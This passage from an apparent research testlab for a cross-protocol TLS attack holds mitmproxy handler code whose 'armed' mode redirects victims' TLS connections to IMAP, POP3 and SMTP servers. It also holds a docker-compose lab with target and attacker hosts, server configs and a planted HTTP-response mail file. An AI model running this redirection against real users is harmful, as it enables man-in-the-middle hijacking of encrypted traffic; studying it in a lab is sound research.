ATTACK_FINISHED = 3 14 | 15 | 16 | class IMAPHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | self._execute_attack(addr, client_socket) 29 | 30 | def _forward_http_traffic(self, addr, client_socket): 31 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 32 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 33 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 35 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 36 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 37 | 38 | def _execute_attack(self, addr, client_socket): 39 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 40 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 41 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | target_socket.connect((self.target_ip, self.target_port)) 43 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 44 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 45 | 46 | target_socket.sendall(b"1 STARTTLS\n") 47 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 48 | 49 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 50 | client_socket.close() 51 | 52 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 53 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/imaps.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class IMAPSHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | self._execute_attack(addr, client_socket) 29 | 30 | def _forward_http_traffic(self, addr, client_socket): 31 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 32 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 33 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 35 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 36 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 37 | 38 | def _execute_attack(self, addr, client_socket): 39 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 40 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 41 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | target_socket.connect((self.target_ip, self.target_port)) 43 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 44 | 45 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 46 | client_socket.close() 47 | 48 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 49 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/pop3.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | 11 | class POP3Handler: 12 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 13 | self.status = defaultdict(int) 14 | self.target_ip = target_ip 15 | self.target_port = target_port 16 | self.unarmed_target_ip = unarmed_target_ip 17 | self.unarmed_target_port = unarmed_target_port 18 | 19 | def handle_connection(self, addr, client_socket, armed): 20 | if not armed: 21 | self._forward_http_traffic(addr, client_socket) 22 | else: 23 | self._execute_attack(addr, client_socket) 24 | 25 | def _forward_http_traffic(self, addr, client_socket): 26 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 27 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 28 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 30 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 31 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 32 | 33 | def _execute_attack(self, addr, client_socket): 34 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 35 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | target_socket.connect((self.target_ip, self.target_port)) 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 38 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 39 | 40 | target_socket.sendall(b"stls\n") 41 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 42 | 43 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 44 | client_socket.close() 45 | 46 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 47 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/pop3s.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | 11 | class POP3SHandler: 12 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 13 | self.status = defaultdict(int) 14 | self.target_ip = target_ip 15 | self.target_port = target_port 16 | self.unarmed_target_ip = unarmed_target_ip 17 | self.unarmed_target_port = unarmed_target_port 18 | 19 | def handle_connection(self, addr, client_socket, armed): 20 | if not armed: 21 | self._forward_http_traffic(addr, client_socket) 22 | else: 23 | self._execute_attack(addr, client_socket) 24 | 25 | def _forward_http_traffic(self, addr, client_socket): 26 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 27 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 28 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 30 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 31 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 32 | 33 | def _execute_attack(self, addr, client_socket): 34 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 35 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | target_socket.connect((self.target_ip, self.target_port)) 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 38 | 39 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 40 | client_socket.close() 41 | 42 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 43 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/smtp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class SMTPHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | self._execute_attack(addr, client_socket) 29 | 30 | def _forward_http_traffic(self, addr, client_socket): 31 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 32 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 33 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 35 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 36 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 37 | 38 | def _execute_attack(self, addr, client_socket): 39 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 40 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 41 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | target_socket.connect((self.target_ip, self.target_port)) 43 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 44 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 45 | 46 | target_socket.sendall(b"STARTTLS\n") 47 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 48 | 49 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 50 | client_socket.close() 51 | 52 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 53 | -------------------------------------------------------------------------------- /testlab/mitmproxy/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/utils/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/utils/common.py: -------------------------------------------------------------------------------- 1 | from collections import namedtuple 2 | 3 | AddressInfo = namedtuple("AddressInfo", ["ip", 'port']) 4 | -------------------------------------------------------------------------------- /testlab/mitmproxy/utils/logging.py: -------------------------------------------------------------------------------- 1 | import logging 2 | from datetime import datetime 3 | import os 4 | 5 | 6 | def init_logging(log_level, log_path=""): 7 | logging.basicConfig(level=log_level, format='%(asctime)s %(name)-15s %(levelname)-8s %(message)s', 8 | datefmt='%d.%m.%Y %H:%M') 9 | 10 | if log_path: 11 | if not os.path.exists(log_path): 12 | os.makedirs(log_path) 13 | 14 | filename = "xprotocol_{}.log".format(datetime.now().strftime("%Y%m%d_%H%M%S")) 15 | fh = logging.FileHandler("{}/{}".format(log_path, filename), 'w') 16 | fh.setLevel(log_level) 17 | 18 | formatter = logging.Formatter('%(asctime)s %(name)-15s %(levelname)-8s %(message)s') 19 | fh.setFormatter(formatter) 20 | logging.getLogger().addHandler(fh) 21 | 22 | 23 | def _log(logger, message, level): 24 | logging.getLogger(logger).log(level, message) 25 | 26 | 27 | def _info(logger, message): 28 | _log(logger, message, logging.INFO) 29 | 30 | 31 | def _debug(logger, message): 32 | _log(logger, message, logging.DEBUG) 33 | 34 | 35 | def _warning(logger, message): 36 | _log(logger, message, logging.WARNING) 37 | 38 | 39 | def _error(logger, message): 40 | _log(logger, message, logging.ERROR) 41 | 42 | 43 | def _exception(logger, message): 44 | logging.getLogger(logger).exception(message) 45 | -------------------------------------------------------------------------------- /testlab/mitmproxy/utils/tls.py: -------------------------------------------------------------------------------- 1 | import select 2 | import time 3 | 4 | from utils.logging import _info, _debug 5 | 6 | 7 | def read_tls_packet(conn): 8 | record_layer = conn.recv(5) 9 | read_bytes = required_bytes = int.from_bytes(record_layer[3:5], 'big') 10 | if not read_bytes: 11 | raise Exception 12 | 13 | per_recv = 1000 14 | data = b'' 15 | while read_bytes > 0: 16 | data += conn.recv(min(per_recv, read_bytes)) 17 | read_bytes = required_bytes - len(data) 18 | #_debug("mitmproxy.tls ", f"TLS [{len((record_layer + data))}] {record_layer + data}") 19 | return record_layer + data 20 | 21 | 22 | def forward_tls_handshake_and_data(addr, client_socket, server_socket): 23 | while True: 24 | try: 25 | ready = select.select([client_socket, server_socket], [], [], 4) 26 | if not ready[0]: 27 | break 28 | for x in ready[0]: 29 | if x == client_socket: 30 | a = read_tls_packet(client_socket) 31 | server_socket.send(a) 32 | else: 33 | client_socket.sendall(read_tls_packet(server_socket)) 34 | except: 35 | _info("mitmproxy.tls ", f"TLS FORWARD ENDED") 36 | break 37 | -------------------------------------------------------------------------------- /testlab/scripts/show_vsftp_log.sh: -------------------------------------------------------------------------------- 1 | DIR="`pwd`/`dirname "$0"`/../servers/docker-compose.yml" 2 | docker-compose -f $DIR exec vsftp tail -f /var/log/vsftpd.log /home/vsftpd/bob/leak -------------------------------------------------------------------------------- /testlab/servers/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | nginx-proxy: 4 | image: jwilder/nginx-proxy 5 | container_name: alpaca-nginx-proxy 6 | ports: 7 | - "127.0.0.1:80:80" 8 | - "127.0.0.1:443:443" 9 | volumes: 10 | - /var/run/docker.sock:/tmp/docker.sock:ro 11 | - ./files/cert/:/etc/nginx/certs/:ro 12 | 13 | nginx-target: 14 | image: php:7.3-apache 15 | container_name: alpaca-nginx-target 16 | environment: 17 | - VIRTUAL_HOST=target.com 18 | - VIRTUAL_PORT=80 19 | volumes: 20 | - ./files/nginx-target/html/:/var/www/html/:ro 21 | 22 | nginx-attacker: 23 | image: nginx 24 | container_name: alpaca-nginx-attacker 25 | depends_on: 26 | - nginx-proxy 27 | environment: 28 | - VIRTUAL_HOST=attacker.com 29 | volumes: 30 | - ./files/nginx-attacker/html/:/usr/share/nginx/html/:ro 31 | 32 | vsftp: 33 | image: alpaca-vsftp 34 | build: 35 | context: files/ftp-vsftp/ 36 | container_name: alpaca-vsftp 37 | tty: true 38 | volumes: 39 | - ./files/cert/:/opt/certs/:ro 40 | - ./files/ftp-vsftp/payload.html:/home/vsftpd/bob/payload.html 41 | ports: 42 | - 0.0.0.0:20:20 43 | - 0.0.0.0:21:21 44 | - 0.0.0.0:10090-10100:10090-10100 45 | environment: 46 | - FTP_USER=bob 47 | - FTP_PASS=12345 48 | - PASV_MIN_PORT=10090 49 | - PASV_MAX_PORT=10100 50 | - REVERSE_LOOKUP_ENABLE=NO 51 | 52 | cyrus: 53 | image: alpaca-cyrus-imap 54 | build: 55 | context: files/mail-cyrus/ 56 | container_name: alpaca-cyrus 57 | tty: true 58 | ports: 59 | - "0.0.0.0:143:143" 60 | - "0.0.0.0:993:993" 61 | volumes: 62 | - ./files/mail-cyrus/imapd.conf:/etc/imapd.conf 63 | - ./files/mail-cyrus/cyrus.conf:/etc/cyrus.conf 64 | - ./files/cert/:/tmp/ssl/ 65 | 66 | proftpd: 67 | image: alpaca-proftpd 68 | build: 69 | context: ./files/ftp-proftpd/ 70 | container_name: alpaca-proftpd 71 | restart: unless-stopped 72 | tty: true 73 | environment: 74 | FTP_LIST: "bob:12345" 75 | USERADD_OPTIONS: "-o --gid 33 --uid 33" 76 | volumes: 77 | - "./files/ftp-proftpd/bob:/home/bob" 78 | - "./files/cert/:/opt/ssl/" 79 | ports: 80 | - 0.0.0.0:20:20 81 | - 0.0.0.0:21:21 82 | - 0.0.0.0:10101-10200:10101-10200 83 | 84 | courier: 85 | image: alpaca-courier 86 | build: 87 | context: ./files/mail-courier/ 88 | container_name: alpaca-courier 89 | restart: unless-stopped 90 | ports: 91 | - "0.0.0.0:110:110" 92 | - "0.0.0.0:143:143" 93 | volumes: 94 | - "./files/cert/:/opt/ssl/" 95 | tty: true 96 | 97 | sendmail: 98 | image: alpaca-sendmail 99 | build: 100 | context: files/mail-sendmail/ 101 | container_name: alpaca-sendmail 102 | tty: true 103 | ports: 104 | - "0.0.0.0:25:25" 105 | volumes: 106 | - ./files/cert/:/tmp/certs/ 107 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM kibatic/proftpd 2 | 3 | ADD proftpd.conf /etc/proftpd/proftpd.conf 4 | ADD tls.conf /etc/proftpd/tls.conf 5 | 6 | RUN chmod 700 /etc/proftpd/proftpd.conf /etc/proftpd/tls.conf 7 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/bob/payload.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/tls.conf: -------------------------------------------------------------------------------- 1 | 2 | TLSEngine on 3 | TLSLog /var/log/proftpd/tls.log 4 | TLSRSACertificateFile /opt/ssl/target.com.crt 5 | TLSRSACertificateKeyFile /opt/ssl/target.com.key 6 | TLSRequired on 7 | 8 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM fauria/vsftpd@sha256:c3988c1b8418018a05688a0553986d87aa7c72a293ad7e74467972c1aad3d6b7 2 | 3 | RUN touch /var/log/vsftpd.log 4 | 5 | ADD vsftpd.conf /etc/vsftpd/vsftpd.conf 6 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/payload.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/vsftpd.conf: -------------------------------------------------------------------------------- 1 | background=NO 2 | anonymous_enable=NO 3 | 4 | local_enable=YES 5 | guest_enable=YES 6 | 7 | virtual_use_local_privs=YES 8 | 9 | write_enable=YES 10 | 11 | pam_service_name=vsftpd_virtual 12 | 13 | user_sub_token=$USER 14 | local_root=/home/vsftpd/$USER 15 | 16 | chroot_local_user=YES 17 | allow_writeable_chroot=YES 18 | 19 | hide_ids=YES 20 | 21 | port_enable=YES 22 | connect_from_port_20=YES 23 | ftp_data_port=20 24 | 25 | seccomp_sandbox=NO 26 | 27 | pasv_max_port=10100 28 | pasv_min_port=10090 29 | pasv_addr_resolve=NO 30 | pasv_enable=YES 31 | pasv_promiscuous=YES 32 | 33 | file_open_mode=0666 34 | local_umask=077 35 | xferlog_std_format=YES 36 | 37 | rsa_cert_file=/opt/certs/target.com.crt 38 | rsa_private_key_file=/opt/certs/target.com.key 39 | 40 | 41 | ssl_enable=YES 42 | require_ssl_reuse=NO 43 | ssl_tlsv1=YES 44 | ssl_sslv2=NO 45 | ssl_sslv3=NO 46 | ssl_ciphers=HIGH 47 | 48 | allow_anon_ssl=NO 49 | 50 | xferlog_std_format=YES 51 | xferlog_enable=YES 52 | xferlog_file=/var/log/vsftpd.log 53 | log_ftp_protocol=YES 54 | pasv_address= 55 | pasv_max_port=10100 56 | pasv_min_port=10090 57 | pasv_addr_resolve=NO 58 | pasv_enable=YES 59 | file_open_mode=0666 60 | local_umask=077 61 | xferlog_std_format=NO 62 | pasv_address= 63 | pasv_max_port=10100 64 | pasv_min_port=10090 65 | pasv_addr_resolve=NO 66 | pasv_enable=YES 67 | file_open_mode=0666 68 | local_umask=077 69 | xferlog_std_format=NO 70 | pasv_address= 71 | pasv_max_port=10100 72 | pasv_min_port=10090 73 | pasv_addr_resolve=NO 74 | pasv_enable=YES 75 | file_open_mode=0666 76 | local_umask=077 77 | xferlog_std_format=NO 78 | pasv_address= 79 | pasv_max_port=10100 80 | pasv_min_port=10090 81 | pasv_addr_resolve=NO 82 | pasv_enable=YES 83 | file_open_mode=0666 84 | local_umask=077 85 | xferlog_std_format=NO 86 | pasv_address= 87 | pasv_max_port=10100 88 | pasv_min_port=10090 89 | pasv_addr_resolve=NO 90 | pasv_enable=YES 91 | file_open_mode=0666 92 | local_umask=077 93 | xferlog_std_format=NO 94 | pasv_address= 95 | pasv_max_port=10100 96 | pasv_min_port=10090 97 | pasv_addr_resolve=NO 98 | pasv_enable=YES 99 | file_open_mode=0666 100 | local_umask=077 101 | xferlog_std_format=NO 102 | pasv_address= 103 | pasv_max_port=10100 104 | pasv_min_port=10090 105 | pasv_addr_resolve=NO 106 | pasv_enable=YES 107 | file_open_mode=0666 108 | local_umask=077 109 | xferlog_std_format=NO 110 | pasv_address= 111 | pasv_max_port=10100 112 | pasv_min_port=10090 113 | pasv_addr_resolve=NO 114 | pasv_enable=YES 115 | file_open_mode=0666 116 | local_umask=077 117 | xferlog_std_format=NO 118 | pasv_address= 119 | pasv_max_port=10100 120 | pasv_min_port=10090 121 | pasv_addr_resolve=NO 122 | pasv_enable=YES 123 | file_open_mode=0666 124 | local_umask=077 125 | xferlog_std_format=NO 126 | pasv_address=0.0.0.0 127 | pasv_max_port=10100 128 | pasv_min_port=10090 129 | pasv_addr_resolve=NO 130 | pasv_enable=YES 131 | file_open_mode=0666 132 | local_umask=077 133 | xferlog_std_format=NO 134 | reverse_lookup_enable=YES 135 | pasv_address=0.0.0.0 136 | pasv_max_port=10100 137 | pasv_min_port=10090 138 | pasv_addr_resolve=NO 139 | pasv_enable=YES 140 | file_open_mode=0666 141 | local_umask=077 142 | xferlog_std_format=NO 143 | reverse_lookup_enable=YES 144 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/Dockerfile: -------------------------------------------------------------------------------- 1 | # Courier IMAP4/POP3/Authdaemon-MySQL 2 | FROM debian:latest 3 | 4 | RUN mkdir -p /var/run/courier/authdaemon/ && touch /var/run/courier/authdaemon/pid.lock 5 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y courier-imap courier-pop courier-authlib-mysql courier-mta gamin rsyslog 6 | RUN mkdir /var/log/courier/ 7 | RUN ln -s /bin/mkdir /usr/bin/mkdir 8 | RUN useradd bob -d /home/bob 9 | RUN echo bob:12345 | chpasswd 10 | RUN mkdir /home/bob/ 11 | RUN maildirmake /home/bob/Maildir 12 | ADD mail.eml /home/bob/Maildir/cur/1602771604.M265899P242V0000000000000036I00000000001A0657_0.f178b3e21560,S=851^%2,S 13 | RUN chmod -R 777 /home/bob/Maildir 14 | RUN chown -R bob:bob /home/bob 15 | EXPOSE 110/tcp 143/tcp 16 | ADD entrypoint.sh /usr/local/bin/entrypoint.sh 17 | ENTRYPOINT ["/usr/local/bin/entrypoint.sh"] -------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cat /opt/ssl/target.com.key /opt/ssl/target.com.crt > /etc/courier/pop3d.pem 3 | chmod 700 /etc/courier/pop3d.pem 4 | chown courier /etc/courier/pop3d.pem 5 | cp /etc/courier/pop3d.pem /etc/courier/imapd.pem 6 | /usr/lib/courier/courier-authlib/authdaemond & 7 | /sbin/rpcbind -w & 8 | /usr/sbin/famd -T 0 9 | service rsyslog start 10 | service courier-pop start 11 | service courier-pop-ssl start 12 | service courier-imap start 13 | service courier-imap-ssl start 14 | bash 15 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-courier/mail.eml: -------------------------------------------------------------------------------- 1 | X-Mozilla-Keys: 2 | X-Mozilla-Keys: 3 | To: test 4 | From: test 5 | Subject: test 6 | Message-ID: <3a7aa2bf-8cc6-e671-72f8-0ad2cd79b989@target.com> 7 | Date: Thu, 15 Oct 2020 16:06:18 +0200 8 | X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0; 9 | attachmentreminder=0; deliveryformat=4 10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 11 | Thunderbird/78.3.2 12 | MIME-Version: 1.0 13 | Content-Type: text/html; charset=utf-8 14 | Content-Transfer-Encoding: 7bit 15 | 16 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM linagora/cyrus-imap:latest 2 | 3 | RUN apt-get update && apt-get install -y rsyslog 4 | 5 | ADD cyrus.conf /etc/cyrus.conf 6 | ADD imapd.conf /etc/imapd.conf 7 | 8 | ADD mails/1.eml /var/spool/cyrus/mail/b/user/bob/1. 9 | RUN chown -R cyrus:mail /var/spool/cyrus/mail/b/user/bob/ 10 | 11 | ADD cyradm_commands /tmp/cyradm_commands 12 | RUN service rsyslog start 13 | 14 | RUN /usr/sbin/cyrmaster & \ 15 | sleep 1;\ 16 | export TERM=xterm;cyradm -u cyrus -w cyrus localhost < /tmp/cyradm_commands 17 | 18 | # CMD bash 19 | # Admin: cyrus:cyrus 20 | # User: bob:bob alice:alice -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/cyradm_commands: -------------------------------------------------------------------------------- 1 | cm user.bob 2 | reconstruct user.bob 3 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/cyrus.conf: -------------------------------------------------------------------------------- 1 | # Debian defaults for Cyrus IMAP server/cluster implementation 2 | # see cyrus.conf(5) for more information 3 | # 4 | # All the tcp services are tcpd-wrapped. see hosts_access(5) 5 | 6 | START { 7 | # do not delete this entry! 8 | recover cmd="/usr/sbin/cyrus ctl_cyrusdb -r" 9 | 10 | # this is only necessary if idlemethod is set to "idled" in imapd.conf 11 | #idled cmd="idled" 12 | 13 | # this is useful on backend nodes of a Murder cluster 14 | # it causes the backend to syncronize its mailbox list with 15 | # the mupdate master upon startup 16 | #mupdatepush cmd="/usr/sbin/cyrus ctl_mboxlist -m" 17 | 18 | # this is recommended if using duplicate delivery suppression 19 | delprune cmd="/usr/sbin/cyrus expire -E 3" 20 | # this is recommended if caching TLS sessions 21 | tlsprune cmd="/usr/sbin/cyrus tls_prune" 22 | } 23 | 24 | # UNIX sockets start with a slash and are absolute paths 25 | # you can use a maxchild=# to limit the maximum number of forks of a service 26 | # you can use babysit=true and maxforkrate=# to keep tight tabs on the service 27 | # most services also accept -U (limit number of reuses) and -T (timeout) 28 | SERVICES { 29 | # --- Normal cyrus spool, or Murder backends --- 30 | # add or remove based on preferences 31 | imap cmd="imapd -U 30" listen="imap" prefork=0 maxchild=100 32 | imaps cmd="imapd -s -U 30" listen="imaps" prefork=0 maxchild=100 33 | pop3 cmd="pop3d -U 30" listen="pop3" prefork=0 maxchild=50 34 | pop3s cmd="pop3d -s -U 30" listen="pop3s" prefork=0 maxchild=50 35 | #nntp cmd="nntpd -U 30" listen="nntp" prefork=0 maxchild=100 36 | #nntps cmd="nntpd -s -U 30" listen="nntps" prefork=0 maxchild=100 37 | #http cmd="httpd -U 30" listen="8008" prefork=0 maxchild=100 38 | #https cmd="httpd -s -U 30" listen="8443" prefork=0 maxchild=100 39 | 40 | 41 | # At least one form of LMTP is required for delivery 42 | # (you must keep the Unix socket name in sync with imap.conf) 43 | #lmtp cmd="lmtpd" listen="localhost:lmtp" prefork=0 maxchild=20 44 | lmtpunix cmd="lmtpd" listen="/var/run/cyrus/socket/lmtp" prefork=0 maxchild=20 45 | # ---------------------------------------------- 46 | 47 | # useful if you need to give users remote access to sieve 48 | # by default, we limit this to localhost in Debian 49 | sieve cmd="timsieved" listen="localhost:sieve" prefork=0 maxchild=100 50 | 51 | # this one is needed for the notification services 52 | notify cmd="notifyd" listen="/var/run/cyrus/socket/notify" proto="udp" prefork=1 53 | 54 | # --- Murder frontends ------------------------- 55 | # enable these and disable the matching services above, 56 | # except for sieve (which deals automatically with Murder) 57 | 58 | # mupdate database service - must prefork at least 1 59 | # (mupdate slaves) 60 | #mupdate cmd="mupdate" listen=3905 prefork=1 61 | # (mupdate master, only one in the entire cluster) 62 | #mupdate cmd="mupdate -m" listen=3905 prefork=1 63 | 64 | # proxies that will connect to the backends 65 | #imap cmd="proxyd" listen="imap" prefork=0 maxchild=100 66 | #imaps cmd="proxyd -s" listen="imaps" prefork=0 maxchild=100 67 | #pop3 cmd="pop3proxyd" listen="pop3" prefork=0 maxchild=50 68 | #pop3s cmd="pop3proxyd -s" listen="pop3s" prefork=0 maxchild=50 69 | #lmtp cmd="lmtpproxyd" listen="lmtp" prefork=1 maxchild=20 70 | # ---------------------------------------------- 71 | } 72 | 73 | EVENTS { 74 | # this is required 75 | checkpoint cmd="/usr/sbin/cyrus ctl_cyrusdb -c" period=30 76 | 77 | # this is only necessary if using duplicate delivery suppression 78 | delprune cmd="/usr/sbin/cyrus expire -E 3" at=0401 79 | 80 | # this is only necessary if caching TLS sessions 81 | tlsprune cmd="/usr/sbin/cyrus tls_prune" at=0401 82 | 83 | # indexing of mailboxes for server side fulltext searches 84 | 85 | # reindex changed mailboxes (fulltext) approximately every other hour 86 | #squatter_1 cmd="/usr/bin/nice -n 19 /usr/sbin/cyrus squatter -s" period=120 87 | 88 | # reindex all mailboxes (fulltext) daily 89 | #squatter_a cmd="/usr/sbin/cyrus squatter" at=0517 90 | } -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/mails/1.eml: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Server: Apache/1.3 3 | Content-type: text/html, text, 